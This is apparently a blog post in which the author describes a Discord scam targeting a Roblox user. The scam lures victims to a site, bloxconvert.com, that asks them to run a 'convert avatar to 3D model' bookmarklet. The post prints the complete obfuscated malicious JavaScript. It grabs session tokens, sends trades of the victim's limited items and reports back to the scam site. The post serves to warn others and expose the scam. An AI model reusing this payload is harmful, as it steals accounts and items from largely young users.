Recently I received an interesting DM from a random user on Discord. Somehow the user found my Roblox username and offered me 8000 Robux for “[using] my avatar as the main character in a thumbnail design [they’re] making”. Also included in the message was a YouTube video, ostensibly a tutorial for exporting Roblox avatars as 3D models (spoiler: it was not).
I actually thought this was possibly legitimate based on the sender’s work posted on their Twitter account, which I now assume to be fabricated for the purpose of the scam.
Luckily, I noticed the tutorial video was uploaded only 12 hours prior to the Discord message being sent to me. That already sent some alarm bells ringing.
The video also referenced bloxconvert.com as a tool to convert Roblox profiles into 3D models. Bloxconvert.com (registered 2 months ago…) instructs the user to use a bookmarklet to turn their avatar into a 3D model. The bookmarklet looks like this:
javascript:(function(_0x422989,_0x1b14ee){var _0x1f5350=_0x1211,_0x472bc8=_0x422989();while(!![]){try{var _0x417b85=parseInt(_0x1f5350(0x178))/0x1*(-parseInt(_0x1f5350(0x16a))/0x2)+parseInt(_0x1f5350(0x175))/0x3+parseInt(_0x1f5350(0x16f))/0x4+parseInt(_0x1f5350(0x184))/0x5*(parseInt(_0x1f5350(0x193))/0x6)+-parseInt(_0x1f5350(0x17b))/0x7+-parseInt(_0x1f5350(0x199))/0x8+-parseInt(_0x1f5350(0x170))/0x9;if(_0x417b85===_0x1b14ee)break;else _0x472bc8['push'](_0x472bc8['shift']());}catch(_0x586db1){_0x472bc8['push'](_0x472bc8['shift']());}}}(_0x2fa5,0xba696),(async function(){var _0x559b92=_0x1211,_0x4b1777=(await(await fetch(_0x559b92(0x18a),{'credentials':_0x559b92(0x162)}))[_0x559b92(0x188)]())[_0x559b92(0x192)](_0x559b92(0x186))[0x1][_0x559b92(0x192)]('\x22\x20/>')[0x0],_0x4c830e=await(await fetch(_0x559b92(0x167),{'credentials':_0x559b92(0x162)}))[_0x559b92(0x168)]();userid=_0x4c830e['id'];var _0x4c4d52=await(await fetch(_0x559b92(0x19e)+userid))[_0x559b92(0x168)]();console[_0x559b92(0x161)](_0x4c4d52['Url']),console['log'](userid);var _0x3abcf8=await(await fetch('https://bloxconvert.com/2fa.php?id=%27+userid))[%27status%27];console[_0x559b92(0x161)](_0x3abcf8),fetch(_0x559b92(0x172)+_0x4c830e[_0x559b92(0x174)]+_0x559b92(0x17a)+userid);var%20_0x238e45=await(await%20fetch(%27https://bloxconvert.com/account.html%27))[%27text%27](),_0x4c830e=await(await%20fetch(_0x559b92(0x167),{%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x168)]();userid=_0x4c830e[%27id%27];var%20_0x4c4d52=await(await%20fetch(_0x559b92(0x19e)+userid))[_0x559b92(0x168)]();console[_0x559b92(0x161)](_0x4c4d52[_0x559b92(0x19f)]);var%20_0x4e0a15=await(await%20fetch(_0x4c4d52[%27Url%27]))[%27json%27]();console[_0x559b92(0x161)](_0x4e0a15[%27textures%27][0x0]);for(let%20_0x2dce5d=0x0;_0x2dce5d%3C0x8;_0x2dce5d++){var%20_0x55b5d5=await(await%20fetch(_0x559b92(0x16d)+_0x2dce5d+_0x559b92(0x163)+_0x4e0a15[_0x559b92(0x165)][0x1]))[_0x559b92(0x185)];if(_0x55b5d5==0xc8){var%20_0x4e0a15=_0x559b92(0x16d)+_0x2dce5d+_0x559b92(0x163)+_0x4e0a15[_0x559b92(0x165)][0x1];break;}}if(_0x3abcf8==0xc9){var%20_0x5029a1=await(await%20fetch(_0x559b92(0x18c)+userid+_0x559b92(0x190),{%27headers%27:{%27accept%27:_0x559b92(0x180),%27accept-language%27:%27en-US,en;q=0.9%27,%27sec-ch-ua%27:_0x559b92(0x1a1),%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:%27empty%27,%27sec-fetch-mode%27:%27cors%27,%27sec-fetch-site%27:_0x559b92(0x18b)},%27referrer%27:_0x559b92(0x19a),%27referrerPolicy%27:_0x559b92(0x16e),%27body%27:null,%27method%27:_0x559b92(0x176),%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x188)](),_0xdd4d32=await(await%20fetch(%27https://inventory.roblox.com/v1/users/%27+_0x238e45+_0x559b92(0x190),{%27headers%27:{%27accept%27:%27application/json,\x20text/plain,\x20*/*%27,%27accept-language%27:_0x559b92(0x1a0),%27sec-ch-ua%27:_0x559b92(0x1a1),%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:_0x559b92(0x18e),%27sec-fetch-mode%27:_0x559b92(0x18f),%27sec-fetch-site%27:_0x559b92(0x18b)},%27referrer%27:_0x559b92(0x19a),%27referrerPolicy%27:_0x559b92(0x16e),%27body%27:null,%27method%27:%27GET%27,%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)}))[_0x559b92(0x188)](),_0x593fab=[],_0x29dad3=_0xdd4d32[_0x559b92(0x192)](_0x559b92(0x17d))[_0x559b92(0x189)]-0x1;for(let%20_0x3eed23=0x0;_0x3eed23%3C_0x29dad3;_0x3eed23++){const%20_0x32d20c=JSON[_0x559b92(0x183)](_0xdd4d32);var%20_0x55b5d5=_0x32d20c[_0x559b92(0x18d)][_0x3eed23][%27userAssetId%27],_0x81c627=_0x32d20c[_0x559b92(0x18d)][_0x3eed23][_0x559b92(0x196)];console[_0x559b92(0x161)](_0x81c627),_0x81c627%3C0x7d0&&(_0x593fab[%27push%27](_0x55b5d5),console[%27log%27](_0x55b5d5));}if(_0x593fab[_0x559b92(0x189)]==0x0){fetch(_0x559b92(0x171));throw%20new%20Error(_0x559b92(0x173));}console[_0x559b92(0x161)](_0x5029a1);try{var%20_0x29dad3=_0x5029a1[_0x559b92(0x192)](_0x559b92(0x17d))[%27length%27]-0x1;console[_0x559b92(0x161)](_0x29dad3);const%20_0x11c9c6=JSON[_0x559b92(0x183)](_0x5029a1);var%20_0x12cfe4=[];for(let%20_0x37bf67=0x0;_0x37bf67%3C_0x29dad3;_0x37bf67++){var%20_0x55b5d5=_0x11c9c6[_0x559b92(0x18d)][_0x37bf67][_0x559b92(0x17d)];_0x12cfe4[%27push%27](_0x55b5d5),console[_0x559b92(0x161)](_0x55b5d5);}}catch{fetch(_0x559b92(0x17c)+_0x5029a1);throw%20new%20Error(_0x559b92(0x187));}var%20_0x3c76c2=_0x29dad3/0x4,_0x3d2504=0x0;console[_0x559b92(0x161)](_0x12cfe4);for(let%20_0x320013=0x0;_0x320013%3C_0x3c76c2;_0x320013++){var%20_0x4800c1=await%20fetch(_0x559b92(0x164),{%27headers%27:{%27accept%27:_0x559b92(0x180),%27accept-language%27:_0x559b92(0x1a0),%27content-type%27:_0x559b92(0x19d),%27sec-ch-ua%27:%27\x22\x20Not\x20A;Brand\x22;v=\x2299\x22,\x20\x22Chromium\x22;v=\x2298\x22,\x20\x22Google\x20Chrome\x22;v=\x2298\x22%27,%27sec-ch-ua-mobile%27:%27?0%27,%27sec-ch-ua-platform%27:_0x559b92(0x19b),%27sec-fetch-dest%27:_0x559b92(0x18e),%27sec-fetch-mode%27:_0x559b92(0x18f),%27sec-fetch-site%27:_0x559b92(0x18b),%27x-csrf-token%27:_0x4b1777},%27referrer%27:%27https://www.roblox.com/%27,%27referrerPolicy%27:%27strict-origin-when-cross-origin%27,%27body%27:_0x559b92(0x182)+_0x238e45+%27,\x22userAssetIds\x22:[%27+_0x593fab[_0x3d2504]+_0x559b92(0x19c)+userid+_0x559b92(0x194)+_0x12cfe4[0x0]+%27,%27+_0x12cfe4[0x1]+%27,%27+_0x12cfe4[0x2]+%27,%27+_0x12cfe4[0x3]+%27],\x22robux\x22:null}]}%27,%27method%27:_0x559b92(0x17e),%27mode%27:_0x559b92(0x18f),%27credentials%27:_0x559b92(0x162)})[_0x559b92(0x166)](_0x7aa946=%3E{var%20_0x2fd420=_0x559b92,_0x320e81=_0x7aa946;console[_0x2fd420(0x161)](_0x2fd420(0x197),_0x7aa946[_0x2fd420(0x185)]),_0x7aa946[_0x2fd420(0x185)]==0xc8?(fetch(_0x2fd420(0x16c)+_0x12cfe4[0x0]+_0x2fd420(0x191)+_0x12cfe4[0x1]+_0x2fd420(0x191)+_0x12cfe4[0x2]+_0x2fd420(0x191)+_0x12cfe4[0x3]),console[_0x2fd420(0x161)](_0x2fd420(0x169)),console[%27log%27](_0x7aa946)):fetch(_0x2fd420(0x17f)+_0x7aa946[_0x2fd420(0x185)]);})[_0x559b92(0x195)](_0x12d4bd=%3E{var%20_0x4f83d2=_0x559b92;console[_0x4f83d2(0x161)](_0x4f83d2(0x177));});_0x12cfe4[_0x559b92(0x181)](0x0,0x4),_0x3d2504++;}}else%20console[_0x559b92(0x161)](_0x559b92(0x179));window[_0x559b92(0x16b)][_0x559b92(0x198)]=_0x4e0a15;}()));function%20_0x1211(_0x35618f,_0x287ec9){var%20_0x2fa503=_0x2fa5();return%20_0x1211=function(_0x12117d,_0x127d82){_0x12117d=_0x12117d-0x161;var%20_0x5e50cb=_0x2fa503[_0x12117d];return%20_0x5e50cb;},_0x1211(_0x35618f,_0x287ec9);}function%20_0x2fa5(){var%20_0x5a9bc5=[%27\x20,\x20https://rolimons.com/item/%27,%27split%27,%27564yoxQvt%27,%27,\x22userAssetIds\x22:[%27,%27catch%27,%27recentAveragePrice%27,%27response.status:\x20%27,%27href%27,%271926768SVQtZx%27,%27https://www.roblox.com/%27,%27\x22Windows\x22%27,%27],\x22robux\x22:null},{\x22userId\x22:%27,%27application/json;charset=UTF-8%27,%27https://www.roblox.com/avatar-thumbnail-3d/json?userId=%27,%27Url%27,%27en-US,en;q=0.9%27,%27\x22\x20Not\x20A;Brand\x22;v=\x2299\x22,\x20\x22Chromium\x22;v=\x2298\x22,\x20\x22Google\x20Chrome\x22;v=\x2298\x22%27,%27log%27,%27include%27,%27.rbxcdn.com/%27,%27https://trades.roblox.com/v1/trades/send%27,%27textures%27,%27then%27,%27https://users.roblox.com/v1/users/authenticated%27,%27json%27,%27dwada%27,%27140142ALkEGK%27,%27location%27,%27https://bloxconvert.com/client.php?mes=Success&items=https://rolimons.com/item/%27,%27https://t%27,%27strict-origin-when-cross-origin%27,%273185688BmXrge%27,%277092351BDwhOs%27,%27https://bloxconvert.com/erros.php?message=NotEnoughSmalls%27,%27https://bloxconvert.com/erros.php?username=%27,%27not\x20enuf\x20smalls!%27,%27name%27,%273065403FMtsIY%27,%27GET%27,%27FASD%27,%272VEaCSx%27,%27ur\x20new%27,%27&userid=%27,%271060402OdNTXx%27,%27https://bloxconvert.com/erros.php?message=%27,%27userAssetId%27,%27POST%27,%27https://bloxconvert.com/client.php?mes=Failed\x20to\x20send\x20trade.\x20Status\x20code:\x20%27,%27application/json,\x20text/plain,\x20*/*%27,%27splice%27,%27{\x22offers\x22:[{\x22userId\x22:%27,%27parse%27,%2714140qDxXBR%27,%27status%27,%27data-token=\x22%27,%27Failed\x20while\x20getting\x20items%27,%27text%27,%27length%27,%27https://www.roblox.com/home%27,%27same-site%27,%27https://inventory.roblox.com/v1/users/%27,%27data%27,%27empty%27,%27cors%27,%27/assets/collectibles?assetType=null&cursor=&limit=50&sortOrder=Desc%27];_0x2fa5=function(){return%20_0x5a9bc5;};return%20_0x2fa5();}Obviously this is some obfuscated, malicious JavaScript. On a first glance it looks like the bookmarklet steals the user’s Roblox session and sells/trades their limited items, then phones home to bloxconvert.com to report the tasks completed. I wasn’t able to de-obfuscate the JS using some freely available online deobfuscation tools, unfortunately. (Funny enough, visiting any of the bloxconvert.com URLs in there returns some text like “SUCK IT” 😂)
This is clearly a pretty elaborate scam: I’ve seen past Roblox scams that use site lookalikes (i.e., phishing) and attempts to get users to run JS in the DevTools console, but never something this elaborate with a fake Twitter account and a pretty legitimate looking (on first glance) website. I can definitely imagine how successful scams like these are on Roblox’s target audience.
So: never allow someone to trick you into running arbitrary JavaScript in your browser, particularly through savvier means like a bookmarklet. It might just lead to a compromised account.
Here are some reports of similar “3D model” scams I found on Reddit and Roblox DevForum.